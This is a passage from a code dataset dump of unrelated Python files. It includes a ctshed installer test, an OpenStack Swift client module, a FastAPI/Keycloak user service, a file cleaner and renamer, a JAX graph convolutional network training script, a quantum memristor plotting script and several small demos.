shutil.rmtree(self.tmp_dir)\n\n    @mock.patch('ctshed.utils.run_docker_build')\n    def test_tool_namespace(self, docker_build):\n        cli_options = {\n            'source': 'biocontainers/blast:2.2.31',\n            'cmd': None,\n            'packages': None,\n            'path': self.tmp_dir,\n        }\n        namespace = random_namespace()\n        options = get_tool_options(namespace, cli_options)\n        executable_path = install(namespace, options)\n        self.assertTrue(docker_build.called)\n        self.assertTrue(os.path.exists(executable_path))\n\n    @mock.patch('ctshed.utils.run_docker_build')\n    def test_cmd_namespace(self, docker_build):\n        cli_options = {\n            'cmd': 'curl',\n            'packages': 'curl',\n            'path': self.tmp_dir,\n        }\n        namespace = random_namespace()\n        options = get_tool_options(namespace, cli_options)\n        executable_path = install(namespace, options)\n        self.assertTrue(docker_build.called)\n        self.assertTrue(os.path.exists(executable_path))\n","repo_name":"kkarolis/ctshed","sub_path":"tests/integration/test_basic.py","file_name":"test_basic.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"19760564047","text":"from yakumo import base\nfrom yakumo.constant import UNDEF\nfrom yakumo import mapper\nfrom yakumo import utils\n\n\nATTRIBUTE_MAPPING = [\n    ('name', 'name', mapper.Noop),\n    ('content_disposition', 'content-disposition', mapper.Noop),\n    ('content_encoding', 'content-encoding', mapper.Noop),\n    ('content_type', 'content-type', mapper.Noop),\n    ('delete_at', 
'x-delete-at', mapper.DateTime),\n ('delete_after', 'x-delete-after', mapper.IntStr),\n ('etag', 'etag', mapper.Noop),\n ('if_none_match', 'if-none-match', mapper.Noop),\n ('modified_at', 'last-modified', mapper.DateTime),\n ('object_count', 'x-container-object-count', mapper.IntStr),\n ('object_manifest', 'x-object-manifest', mapper.Noop),\n ('size', 'content-length', mapper.IntStr),\n ('static_large_object', 'x-static-large-object', mapper.Noop),\n ('timestamp', 'x-timestamp', mapper.FloatStr),\n ('trans_id', 'x-trans-id', mapper.Noop),\n ('trans_id_extra', 'x-trans-id-extra', mapper.Noop),\n ('metadata', 'metadata', mapper.Noop),\n ('data', 'data', mapper.Noop),\n]\n\n\nclass Resource(base.SwiftV1Resource):\n \"\"\"resource class for containers on Object Storage V1 API\"\"\"\n\n def update(self, content_disposition=UNDEF, content_encoding=UNDEF,\n content_type=UNDEF, delete_after=UNDEF, delete_at=UNDEF,\n trans_id_extra=UNDEF, metadata=UNDEF):\n \"\"\"\n Update metadata of an object\n\n @keyword content_disposition: Specifies the override behavior for the\n browser\n @type content_disposition: str\n @keyword content_encoding: Content-Encoding metadata\n @type content_encoding: str\n @keyword content_type: MIME type for the object\n @type content_type: str\n @keyword delete_after: Seconds after which the system removes the\n object\n @type delete_after: int\n @keyword delete_at: When the system removes the object\n @type delete_at: datetime.datetime\n @keyword trans_id_extra: Extra transaction information\n @type trans_id_extra: str\n @keyword metadata: Key-value style metadata\n @type metadata: dict\n @rtype: None\n \"\"\"\n super(Resource, self).update(\n content_disposition=content_disposition,\n content_encoding=content_encoding,\n content_type=content_type,\n delete_at=delete_at,\n delete_after=delete_after,\n trans_id_extra=trans_id_extra,\n metadata=metadata)\n\n def replace(self, content_disposition=UNDEF, content_encoding=UNDEF,\n content_type=UNDEF, etag=UNDEF, if_none_match=UNDEF,\n delete_after=UNDEF, delete_at=UNDEF, object_manifest=UNDEF,\n size=UNDEF, trans_id_extra=UNDEF, metadata=UNDEF, file=None):\n \"\"\"\n Replace an object\n\n @keyword content_disposition: Specifies the override behavior for the\n browser\n @type content_disposition: str\n @keyword content_encoding: Content-Encoding metadata\n @type content_encoding: str\n @keyword content_type: MIME type for the object\n @type content_type: str\n @keyword etag: MD5 checksum of the object\n @type etag: str\n @keyword if_none_match: If-None-Match header\n @type if_none_match: str\n @keyword delete_after: When the system removes the object\n @type delete_after: datetime.datetime\n @keyword delete_at: When the system removes the object\n @type delete_at: datetime.datetime\n @keyword object_manifest: Dynamic large object manifest object\n @type object_manifest: str\n @keyword size: Object size\n @type size: int\n @keyword trans_id_extra: Extra transaction information\n @type trans_id_extra: str\n @keyword metadata: Key-value style metadata\n @type metadata: dict\n @keyword file: File name to upload\n @type file: str\n @rtype: None\n \"\"\"\n old_attrs = self.get_attrs()\n new_attrs = dict(\n content_disposition=content_disposition,\n content_encoding=content_encoding,\n content_type=content_type,\n object_manifest=object_manifest,\n delete_after=delete_after,\n delete_at=delete_at,\n etag=etag,\n if_none_match=if_none_match,\n size=size,\n trans_id_extra=trans_id_extra,\n metadata=metadata)\n for key, value in 
new_attrs.items():\n            if value is UNDEF:\n                new_attrs[key] = old_attrs[key]  # fall back to the object's current value\n\n        self._manager.create(self._id, file=file, **new_attrs)\n        self.reload()\n\n    def copy(self, container=UNDEF, name=UNDEF):\n        \"\"\"\n        Copy an object\n\n        @param container: Destination container\n        @type container: swift.container.Resource\n        @param name: Destination object name\n        @type name: str\n        @return: New object\n        @rtype: swift.v1.file_object.Resource\n        \"\"\"\n        if container is UNDEF:\n            container = self._manager.parent_resource\n        headers = {\n            \"x-copy-from\": \"/%s/%s\" % (\n                self._manager.parent_resource.get_id(), self._id),\n        }\n        self._http.put_raw(container._manager._url_resource_path,\n                           container.get_id(), name,\n                           headers=headers)\n        return container.object.get_empty(name)\n\n    def download(self, file=None):\n        \"\"\"\n        Download an object into a file\n\n        @keyword file: File name to save\n        @type file: str\n        @rtype: None\n        \"\"\"\n        self._http.get_file(self._url_resource_path, self._id, file=file)\n\n    def set_metadata(self, **metadata):\n        \"\"\"\n        Update metadata of an object\n\n        @keyword metadata: key=value style.\n        @type metadata: dict\n        @rtype: None\n        \"\"\"\n        if self.metadata is None:\n            self.metadata = {}\n        self.metadata.update(metadata)\n        self.update()\n\n    def unset_metadata(self, *keys):\n        \"\"\"\n        Delete metadata of an object\n\n        @param keys: keys of the metadata\n        @type keys: [str]\n        @rtype: None\n        \"\"\"\n        if self.metadata is None:\n            return\n        for key in keys:\n            if key in self.metadata:\n                self.metadata.pop(key)\n        self.update()\n\n\nclass Manager(base.SwiftV1SubManager):\n    \"\"\"manager class for objects on Object Storage V1 API\"\"\"\n\n    resource_class = Resource\n    service_type = 'object-store'\n    _attr_mapping = ATTRIBUTE_MAPPING\n    _has_detail = False\n    _url_resource_path = '/%s'\n    _json_resource_key = 'object'\n\n    def create(self, name, content_disposition=UNDEF, content_encoding=UNDEF,\n               content_type=UNDEF, etag=UNDEF, if_none_match=UNDEF,\n               delete_after=UNDEF, delete_at=UNDEF, object_manifest=UNDEF,\n               size=UNDEF, trans_id_extra=UNDEF, metadata=UNDEF, file=None):\n        \"\"\"\n        Create an object\n\n        @param name: Object name\n        @type name: str\n        @keyword content_disposition: Specifies the override behavior for the\n            browser\n        @type content_disposition: str\n        @keyword content_encoding: Content-Encoding metadata\n        @type content_encoding: str\n        @keyword content_type: MIME type for the object\n        @type content_type: str\n        @keyword etag: MD5 checksum of the object\n        @type etag: str\n        @keyword if_none_match: If-None-Match header\n        @type if_none_match: str\n        @keyword delete_after: Seconds after which the system removes the\n            object\n        @type delete_after: int\n        @keyword delete_at: When the system removes the object\n        @type delete_at: datetime.datetime\n        @keyword object_manifest: Dynamic large object manifest object\n        @type object_manifest: str\n        @keyword size: Object size\n        @type size: int\n        @keyword trans_id_extra: Extra transaction information\n        @type trans_id_extra: str\n        @keyword metadata: Key-value style metadata\n        @type metadata: dict\n        @keyword file: File name to upload\n        @type file: str\n        @return: Created object\n        @rtype: yakumo.swift.v1.file_object.Resource\n        \"\"\"\n        data = UNDEF\n        if file:\n            data = utils.gen_chunk(file)\n        return super(Manager, self).create(\n            name,\n            content_disposition=content_disposition,\n            content_encoding=content_encoding,\n            content_type=content_type,\n            object_manifest=object_manifest,\n            delete_after=delete_after,\n            delete_at=delete_at,\n            etag=etag,\n            if_none_match=if_none_match,\n            
size=size,\n            trans_id_extra=trans_id_extra,\n            metadata=metadata,\n            data=data)\n","repo_name":"iliiilililii/python-yakumo","sub_path":"yakumo/swift/v1/file_object.py","file_name":"file_object.py","file_ext":"py","file_size_in_byte":8869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"}
{"seq_id":"16035909353","text":"class Matrix(object):\n    \n    # upon creation the matrix object expects a 2 dimensional list\n    # A = Matrix([[1,2,3], [3,4,5]])\n    def __init__(self, m):\n        self.m = m\n    \n    def add(self, n):\n        \n        # if n is an int or a float\n        if isinstance(n, int) or isinstance(n, float):\n            for i in range(len(self.m)):\n                for j in range(len(self.m[i])):\n                    self.m[i][j] += n\n        \n        # if n is another Matrix\n        if isinstance(n, Matrix):\n            for i in range(len(self.m)):\n                for j in range(len(self.m[i])):\n                    self.m[i][j] += n.m[i][j]\n    \n    \n    # return row n\n    def getRow(self, n):\n        return self.m[n]\n    \n    \n    # return column n\n    def getColl(self, n):\n        c = []\n        for i in self.m:\n            c.append(i[n])\n        return c\n    \n    \n    # return the dot product for two vectors\n    def dotVec(self, v1, v2):\n        multSum = 0\n        for i in range(len(v1)):\n            multSum += v1[i] * v2[i]\n        \n        return multSum\n    \n    \n    # calculate the dot product of this matrix with matrix n\n    # return the result as a new matrix\n    # the number of columns of this matrix must be equal to the number of rows of matrix n\n    def dot(self, n):\n        l = []\n        lm = []\n        numRows = len(self.m)\n        numcols = len(n.m[0])\n        \n        # do the math\n        for i in range(numRows):\n            r = self.getRow(i)\n            for j in range(numcols):\n                c = n.getColl(j)\n                l.append(self.dotVec(r, c))\n        \n        # turn l into a Matrix\n        ind = 0\n        for i in range(numRows):\n            lm.append(l[ind : ind + numcols])\n            ind += numcols\n        \n        return Matrix(lm)\n","repo_name":"hanswillem/machine_learning","sub_path":"matrix_class.py","file_name":"matrix_class.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"27650812935","text":"\"\"\"_summary_\r\nRenamerInitHyphen.py removes initial hyphen of the file. 
Searches subfolders.\r\n\"\"\"\r\n\r\nimport os\r\nimport re\r\n\r\npath = input(\"(RenamerInitHyphen.py): \")\r\n\r\n# only file extensions in this list will be renamed\r\nexts = ['.docx', '.doc', '.odt', '.pptx', '.odp', '.png', '.jpg', '.jfif', '.jpeg', '.gif', '.bmp', '.pdf', '.xlsx', 'xls', '.txt']\r\n\r\n# determines if the previous conditional statements were executed\r\nexecuted = False\r\nqueried = False\r\n\r\n# ends range(0,2)\r\nchanges = False\r\n\r\nfor i in range(0,2):\r\n if queried and not changes:\r\n break\r\n for root, dirs, files in os.walk(path):\r\n os.chdir(root)\r\n end = 0\r\n for filename in os.listdir(root):\r\n file_ext = os.path.splitext(filename)[1]\r\n if re.match(r'^-', filename) and file_ext != '':\r\n new_filename = re.sub(r'^-', '', filename, count=1)\r\n if queried:\r\n os.rename(filename, new_filename)\r\n print(filename + \" to \" + new_filename)\r\n if not queried:\r\n query = input(\"Accept Changes [ACCEPT]: \")\r\n queried = True\r\n if query.upper() == 'ACCEPT':\r\n print(\"Changes accepted\")\r\n changes = True\r\n else:\r\n print(\"Changes not accepted\")\r\n changes = False","repo_name":"WorkNicolas/Filename-Renamer","sub_path":"src/RenamerInitHyphen.py","file_name":"RenamerInitHyphen.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1429984134","text":"from fastapi import HTTPException\nfrom starlette.responses import JSONResponse\nfrom iteration_utilities import unique_everseen\n\nfrom starlette.status import (\n HTTP_200_OK,\n HTTP_201_CREATED,\n HTTP_204_NO_CONTENT\n)\n\nfrom ..services import (\n KeyCloakService,\n AuthService\n)\n\nfrom ..utils import build_response\n\nfrom ..db import (\n MongoDB,\n get_client\n)\n\nfrom ..models.user_models import (\n OutUser,\n User,\n MongoUser,\n UpdateUser\n)\n\n\nclass UserService:\n def __init__(self):\n super().__init__()\n self._db = MongoDB(get_client())\n self._keycloak_service = KeyCloakService()\n self._auth_service = AuthService()\n\n async def create_new_user(self, user: User):\n user_dict: dict = user.dict()\n user_id: str = await self._keycloak_service.create_user(user_dict)\n user_dict.update({'user_id': user_id})\n user_dict.pop('password')\n\n _ = await self._db.insert_user(MongoUser(**user_dict).dict())\n\n return await build_response(HTTP_201_CREATED, msg='New user created')\n\n async def get_current_user(self, token: str):\n user_dict: dict = await self._auth_service.check_active_token(token)\n return await build_response(data=OutUser(**user_dict).dict())\n\n async def update_user(self, user: UpdateUser, token: str):\n current_data: dict = await self._auth_service.check_active_token(token)\n _ = await self._keycloak_service.update_user(user, current_data.get('user_id'))\n\n update_user: dict = user.dict(exclude_unset=True)\n\n updated_user = await self._db.update_user(update_user, current_data.get('user_id'))\n return await build_response(data=OutUser(**updated_user).dict())\n\n # async def delete_user(self, token: str):\n # user_dict: dict = await self._auth_service.check_active_token(token)\n # user = await self._db.delete_user(user_dict['email'])\n\n # if user:\n # return await build_response(msg='Removed user successfully')\n\n # raise HTTPException(\n # status_code=HTTP_204_NO_CONTENT,\n # detail='Remove user failed'\n # 
)\n","repo_name":"kumaF/fastapi-keycloak-boilerplate","sub_path":"app/services/user_service.py","file_name":"user_service.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"25616244881","text":"import tkinter as tk\nfrom grafik.ball import Ball\n\n\ndef add_ball(event=None):\n Ball.add(my_canvas)\n\n\ndef remove_ball(event=None):\n Ball.remove()\n\n\ndef refresh():\n [ball.draw() for ball in Ball.get_balls()]\n my_canvas.after(25, refresh)\n\n\nwindow = tk.Tk()\nwindow.bind(\"\", add_ball)\nwindow.bind(\"\", remove_ball)\n\nlabel = tk.Label(window, text=\"Gravity\")\nmy_canvas = tk.Canvas(window, height=1500, width=1500, bg=\"#FFFFFF\")\n\n[Ball.add(my_canvas) for i in range(3)]\n[my_canvas.after(25, refresh) for ball in Ball.get_balls()]\n\nlabel.pack()\nmy_canvas.pack()\n\nwindow.mainloop()\n","repo_name":"tmontel/tkball","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72153375235","text":"import os\n\nfilename = str(input(\"Nome do arquivo.txt: \"))\nf=open(\"/home/usuario/Documentos/GitHub/cursos/Arquivos_Curso_Python/\"+filename,\"at\")\n\nos.system(\"clear\")\ntxt=input(\"Digite um texto: \")\nf.write(txt+\"\\n\")\n\nf.close()\n","repo_name":"maledicente/cursos","sub_path":"Arquivos_Curso_Python/aula44.py","file_name":"aula44.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1857683375","text":"import os\nimport re\nimport datetime as dt\n\nfrom env.running_env import milestone_base, image_base, exp_base, log_base\nfrom utils.objectIO import fetch_file_name, dir_files, remove_files\n\n\nclass FileCleaner:\n ERROR_MESS1 = \"Do not search date to satisfy the regular(FileCleaner.pattern).\"\n ERROR_MESS2 = \"Do not search date to satisfy the regular(FileCleaner.data_pattern).\"\n\n def __init__(self, remain_days: int, year: int = 2023):\n self.curt_year = year\n self.remain = remain_days\n self.format_time = \"%Y.%m.%d\"\n # 匹配两种文件格式,一种是日志,一种��普通带日期文件,都只提取日期\n self.pattern = re.compile(r\"---([\\d\\.]+)\\.[\\w]+$|^\\d+\\.([\\d\\.]+)_\", re.MULTILINE)\n self.data_pattern = re.compile(r\"[\\d\\.]+\", re.MULTILINE)\n\n def day_consumed(self, date: str) -> int:\n curt_date_str = dt.datetime.now().strftime(self.format_time)\n curt_date = dt.datetime.strptime(curt_date_str, self.format_time).date()\n date = dt.datetime.strptime(date, self.format_time).date()\n days = (curt_date - date).days\n return days\n\n def fetch_date(self, file_name: str) -> str:\n date = None\n match = self.pattern.search(file_name)\n assert match, self.ERROR_MESS1\n for group in match.groups():\n if group:\n if self.data_pattern.match(group):\n date = group\n assert date, self.ERROR_MESS2\n return f\"{self.curt_year}.{date}\"\n\n def find_files(self) -> list:\n all_files = []\n files_path = []\n files_base = [milestone_base, log_base, image_base, exp_base]\n for base in files_base:\n all_files.extend(dir_files(base))\n\n for f_path in all_files:\n file_name = fetch_file_name(f_path)\n if self.pattern.search(file_name):\n if self.day_consumed(self.fetch_date(file_name)) > self.remain:\n files_path.append(f_path)\n return files_path\n\n def clear_files(self):\n to_del = self.find_files()\n 
remove_files(to_del)\n","repo_name":"Wolfsion/FedLA","sub_path":"utils/Cleaner.py","file_name":"Cleaner.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"40955784212","text":"from translate import Translator\nimport translate\nimport PySimpleGUI as sg #import the required libraries\n\nlayout = [ #build the window layout\n    [sg.Text('Frase/Termo:'), sg.Input('', key='entrada'), sg.Button('Traduzir')],\n    #row 1 creates a label, a text-input box keyed as \"entrada\", and a button\n    [sg.Text('', key='traducao')]\n    #row 2 creates a label, still blank, keyed as \"traducao\"\n]\n\nwindow = sg.Window('Tradutor Pt-Br -> En', layout=layout)\n#create the window with its title and layout\nt = Translator(from_lang='pt-br', to_lang='english')\n#create the translator object with the translation parameters\n\nwhile True: #window read loop\n    event, values = window.read() #read the window's events and values\n    if event == sg.WINDOW_CLOSED: #if the close button is clicked, break out of the loop\n        break\n    if event == 'Traduzir': #handle a click on the \"Traduzir\" button\n        traducao = t.translate(values['entrada'])\n        #\"t\" translates the text and stores the result in another variable\n        window['traducao'].update(f'Tradução: {traducao}')\n        #update the window text keyed \"traducao\" with the translated content\n\n    #end of the script\n","repo_name":"MateusAtaide/projetos_python","sub_path":"Tradutor_Pt-En/tradutor_Pt-En.py","file_name":"tradutor_Pt-En.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"32217671668","text":"import argparse\nimport time\n\nimport numpy\nimport jax\nimport jax.numpy as np\nfrom jax import jit, grad, random\nfrom jax.experimental import optimizers\n\nfrom utils import load_data\nfrom models import GCN\n\n@jit\ndef loss(params, batch):\n    \"\"\"\n    The idxes of the batch indicate which nodes are used to compute the loss.\n    \"\"\"\n    inputs, targets, adj, is_training, rng, idx = batch\n    preds = predict_fun(params, inputs, adj, is_training=is_training, rng=rng)\n    ce_loss = -np.mean(np.sum(preds[idx] * targets[idx], axis=1))\n    l2_loss = 5e-4 * optimizers.l2_norm(params)**2 # tf doesn't use sqrt\n    return ce_loss + l2_loss\n\n@jit\ndef accuracy(params, batch):\n    inputs, targets, adj, is_training, rng, idx = batch\n    target_class = np.argmax(targets, axis=1)\n    predicted_class = np.argmax(predict_fun(params, inputs, adj, is_training=is_training, rng=rng), axis=1)\n    return np.mean(predicted_class[idx] == target_class[idx])\n\n@jit\ndef loss_accuracy(params, batch):\n    inputs, targets, adj, is_training, rng, idx = batch\n    preds = predict_fun(params, inputs, adj, is_training=is_training, rng=rng)\n    target_class = np.argmax(targets, axis=1)\n    predicted_class = np.argmax(preds, axis=1)\n    ce_loss = -np.mean(np.sum(preds[idx] * targets[idx], axis=1))\n    acc = np.mean(predicted_class[idx] == target_class[idx])\n    return ce_loss, acc\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--seed', type=int, default=0)\n    parser.add_argument('--hidden', type=int, default=16)\n    parser.add_argument('--epochs', type=int, default=200)\n    parser.add_argument('--dropout', type=float, default=0.5)\n    parser.add_argument('--lr', type=float, default=0.01)\n    parser.add_argument('--early_stop', 
type=int, default=10)\n parser.add_argument('--dataset', type=str, default='cora')\n parser.add_argument('--sparse', dest='sparse', action='store_true')\n parser.add_argument('--no-sparse', dest='sparse', action='store_false')\n parser.set_defaults(sparse=True)\n args = parser.parse_args()\n\n # Load data\n adj, features, labels, idx_train, idx_val, idx_test = load_data(args.dataset, sparse = args.sparse)\n\n rng_key = random.PRNGKey(args.seed)\n dropout = args.dropout\n step_size = args.lr\n hidden = args.hidden\n num_epochs = args.epochs\n n_nodes = features.shape[0]\n n_feats = features.shape[1]\n early_stopping = args.early_stop\n\n init_fun, predict_fun = GCN(nhid=hidden, \n nclass=labels.shape[1],\n dropout=dropout,\n sparse=args.sparse)\n input_shape = (-1, n_nodes, n_feats)\n rng_key, init_key = random.split(rng_key)\n _, init_params = init_fun(init_key, input_shape)\n\n opt_init, opt_update, get_params = optimizers.adam(step_size)\n\n @jit\n def update(i, opt_state, batch):\n params = get_params(opt_state)\n return opt_update(i, grad(loss)(params, batch), opt_state)\n\n opt_state = opt_init(init_params)\n\n print(\"\\nStarting training...\")\n val_values = []\n for epoch in range(num_epochs):\n start_time = time.time()\n batch = (features, labels, adj, True, rng_key, idx_train)\n opt_state = update(epoch, opt_state, batch)\n epoch_time = time.time() - start_time\n\n params = get_params(opt_state)\n eval_batch = (features, labels, adj, False, rng_key, idx_val)\n train_batch = (features, labels, adj, False, rng_key, idx_train)\n train_loss, train_acc = loss_accuracy(params, train_batch)\n val_loss, val_acc = loss_accuracy(params, eval_batch)\n val_values.append(val_loss.item())\n print(f\"Iter {epoch}/{num_epochs} ({epoch_time:.4f} s) train_loss: {train_loss:.4f}, train_acc: {train_acc:.4f}, val_loss: {val_loss:.4f}, val_acc: {val_acc:.4f}\")\n\n # new random key at each iteration, othwerwise dropout uses always the same mask \n rng_key, _ = random.split(rng_key)\n if epoch > early_stopping and val_values[-1] > numpy.mean(val_values[-(early_stopping+1):-1]):\n print(\"Early stopping...\")\n break\n \n # now run on the test set\n test_batch = (features, labels, adj, False, rng_key, idx_test)\n test_acc = accuracy(params, test_batch)\n print(f'Test set acc: {test_acc}')","repo_name":"gcucurull/jax-gcn","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"61"} +{"seq_id":"25440509809","text":"#!/usr/bin/env python3\n\n\n#全局变量在整个py文件中声明,全局范围内可以使用\n#在函数内部,如果局部变量与全局变量变量名一样,则优先调用局部变量。\n#如果想在函数内部改变全局变量,需要在前面加上global关键字\nvalue = 100\ndef test():\n value = 250 #与全局变量同名,不是修改全局变量,而是创建局部变量\n print(value)\n \ndef test1():\n global value\n value = 1000 #修改的是全局变量\n print(value)\n \n\n#函数内创建全局变量,在变量名前面加上global\ndef test2():\n global num\n num = 123\n print(num)\n \n#回调函数中创建的局部变量,要想下次回调继续使用,要声明为全局变量\n\n\n\nif __name__ == \"__main__\":\n test()\n test1() #函数体内修改全局变量\n test2() #函数体内创建全局变量\n print(num) \n\n","repo_name":"plainchan/python_proj","sub_path":"全局变量与局部变量.py","file_name":"全局变量与局部变量.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71423244353","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport qutip as qp\r\n\r\nfrom QM_evol import memristor_evolution as me\r\n\r\n# Load data\r\nData_best = 
pd.read_csv(r'data\\best_ff_75percentile.csv')\r\nData_worst = pd.read_csv(r'data\\worst_ff_25percentile.csv')\r\n\r\n# single quantum memristor\r\nData_sqm = Data_best.loc[(Data_best['C12'] == 0) & (Data_best['L12'] == 0)]\r\nidx_sqm = Data_sqm['Formfactor_1'].idxmax() # index of the row with highest form factor for single quantum memristor\r\nparameters_sqm = [[np.pi/2, Data_sqm['theta'].iloc[idx_sqm]], # theta_1\r\n [np.pi/2, Data_sqm['theta'].iloc[idx_sqm]], # theta_2\r\n Data_sqm['lambda_'].iloc[idx_sqm]] # lambda\r\n\r\n# Data best case\r\nidx_best = Data_best['Formfactor_1'].idxmax()\r\nparameters_best = [[np.pi/2, Data_best['theta'].iloc[idx_best]], # theta_1\r\n [np.pi/2, Data_best['theta'].iloc[idx_best]], # theta_2\r\n Data_best['lambda_'].iloc[idx_best], # lambda\r\n Data_best['C12'].iloc[idx_best], # C12\r\n Data_best['L12'].iloc[idx_best]] # L12\r\n\r\n# Data worst case\r\nidx_worst = Data_worst['Formfactor_1'].idxmin()\r\nparameters_worst = [[np.pi/2, Data_best['theta'].iloc[idx_worst]], # theta_1\r\n [np.pi/2, Data_best['theta'].iloc[idx_worst]], # theta_2\r\n Data_best['lambda_'].iloc[idx_worst], # lambda\r\n Data_best['C12'].iloc[idx_worst], # C12\r\n Data_best['L12'].iloc[idx_worst]] # L12\r\n\r\n\r\n# Calculate the evolution with the best parameters\r\nRho_sqm, Results_sqm, Params_sqm = me.Coupled_memristor_evolution(*parameters_sqm, n_osci=10) # evolves two identical and uncoupled quantum memristors\r\n# equivalent to evolving a single quantum memristor\r\n\r\n# Set form factor, voltage and current into different variables\r\nFF_sqm, V_aux_sqm, Iqp_aux_sqm = Results_sqm\r\nt_sqm, indices_sqm, params_sqm = Params_sqm\r\n\r\n# Put the best parameters into separate variables\r\nomega1_sqm = params_sqm['omega1']\r\nomega2_sqm = params_sqm['omega2']\r\nI1_0_sqm = params_sqm['I1_0']\r\nI2_0_sqm = params_sqm['I2_0']\r\nV1_0_sqm = params_sqm['V1_0']\r\nV2_0_sqm = params_sqm['V2_0']\r\ntimescale_sqm = params_sqm['timescale']\r\n\r\n\r\n# Calculate evolution for coupled quantum memristors\r\nn_oscillations = 20\r\nRho_best, Results_best, Params_best = me.Coupled_memristor_evolution(*parameters_best, n_osci=n_oscillations) \r\nRho_worst, Results_worst, Params_worst = me.Coupled_memristor_evolution(*parameters_worst, n_osci=n_oscillations) \r\n\r\n# Best\r\nFF_best, V_aux_best, Iqp_aux_best = Results_best\r\nt_best, indices_best, params_best = Params_best\r\n\r\nomega1_best = params_best['omega1']\r\nomega2_best = params_best['omega2']\r\nI1_0_best = params_best['I1_0']\r\nI2_0_best = params_best['I2_0']\r\nV1_0_best = params_best['V1_0']\r\nV2_0_best = params_best['V2_0']\r\ntimescale_best = params_best['timescale']\r\n\r\n# Worst\r\nFF_worst, V_aux_worst, Iqp_aux_worst = Results_worst\r\nt_worst, indices_worst, params_worst = Params_worst\r\n\r\nomega1_worst = params_worst['omega1']\r\nomega2_worst = params_worst['omega2']\r\nI1_0_worst = params_worst['I1_0']\r\nI2_0_worst = params_worst['I2_0']\r\nV1_0_worst = params_worst['V1_0']\r\nV2_0_worst = params_worst['V2_0']\r\ntimescale_worst = params_worst['timescale']\r\n\r\n\r\n# Calculate concurrence\r\nFF_1_best = FF_best[0]\r\nFF_2_best = FF_best[1]\r\n\r\nFF_1_worst = FF_worst[0]\r\nFF_2_worst = FF_worst[1]\r\n\r\n\r\nconcurrence_best = np.zeros(len(Rho_best.states))\r\nconcurrence_worst = np.zeros(len(Rho_worst.states))\r\n\r\nfor t1, state in enumerate(Rho_best.states):\r\n concurrence_best[t1] = qp.concurrence(state)\r\n \r\nfor t1, state in enumerate(Rho_worst.states):\r\n concurrence_worst[t1] = 
qp.concurrence(state)\r\n\r\n\r\n# Generate figures\r\n# Fig 1\r\nfig1 = plt.figure(1)\r\n\r\nax_sqm1 = fig1.add_subplot(1,2,1)\r\nax_sqm2 = fig1.add_subplot(1,2,2)\r\n\r\ncount = 10*500\r\nax_sqm1.plot(V_aux_sqm[0][0:count]/V1_0_sqm, Iqp_aux_sqm[0][0:count]/I1_0_sqm,\r\n lw = 1.5, color='black')\r\nax_sqm1.set_xlabel(r'$V/V_0$', fontsize = 20, labelpad = 10)\r\nax_sqm1.set_ylabel(r'$I/I_0$', fontsize = 20, labelpad = 10)\r\nax_sqm1.tick_params(axis='both', which='major', labelsize=15, width = 2, length=4)\r\n\r\nax_sqm2.plot(t_sqm[indices_sqm[1:]]/timescale_sqm, FF_sqm[0], lw=1, ls='--', marker='o')\r\nax_sqm2.set_ylim([0, 0.35])\r\nax_sqm2.set_xlabel(r'$t/T$', fontsize = 25, labelpad = 10)\r\nax_sqm2.set_ylabel(r'$\\mathcal{F}$', fontsize = 25, labelpad = 10)\r\nax_sqm2.tick_params(axis='both', which='major', labelsize=20, width = 2, length=4)\r\n\r\nplt.tight_layout()\r\n\r\n\r\n# ---- Fig2 ----\r\nfig3 = plt.figure(3)\r\n\r\nax31 = fig3.add_subplot(1,2,1)\r\nax32 = fig3.add_subplot(1,2,2)\r\n\r\n# best case \r\ncount = 10*500\r\nax31.plot(V_aux_best[0][0:count]/V1_0_best, Iqp_aux_best[0][0:count]/I1_0_best,\r\n lw = 1.5, label='optimal', color='black')\r\nax31.set_title('optimal', fontsize = 20)\r\nax31.set_xlabel(r'$V/V_0$', fontsize = 20, labelpad = 10)\r\nax31.set_ylabel(r'$I/I_0$', fontsize = 20, labelpad = 10)\r\nax31.tick_params(axis='both', which='major', labelsize=15, width = 2, length=4)\r\n\r\n\r\n# worst case \r\nax32.plot(V_aux_worst[1][0:count]/V2_0_worst, Iqp_aux_worst[1][0:count]/I2_0_worst,\r\n lw = 1.5, label='suboptimal', color='black')\r\nax32.set_title('suboptimal', fontsize = 20)\r\nax32.set_xlabel(r'$V/V_0$', fontsize = 20, labelpad = 10)\r\nax32.set_ylabel(r'$I/I_0$', fontsize = 20, labelpad = 10)\r\nax32.tick_params(axis='both', which='major', labelsize=15, width = 2, length=4)\r\nplt.tight_layout()\r\n\r\n\r\n# ---- Fig 4 --- \r\nfig4 = plt.figure(4)\r\n\r\nax41 = fig4.add_subplot(1,1,1)\r\n\r\nax41.plot(t_best[indices_best[1:]]/timescale_best, FF_best[0], lw=1, marker='o', label='optimal', color='black')\r\nax41.plot(t_worst[indices_worst[1:]]/timescale_worst, FF_worst[0], lw=1, ls='--', marker='o', label='suboptimal',color='grey')\r\n# 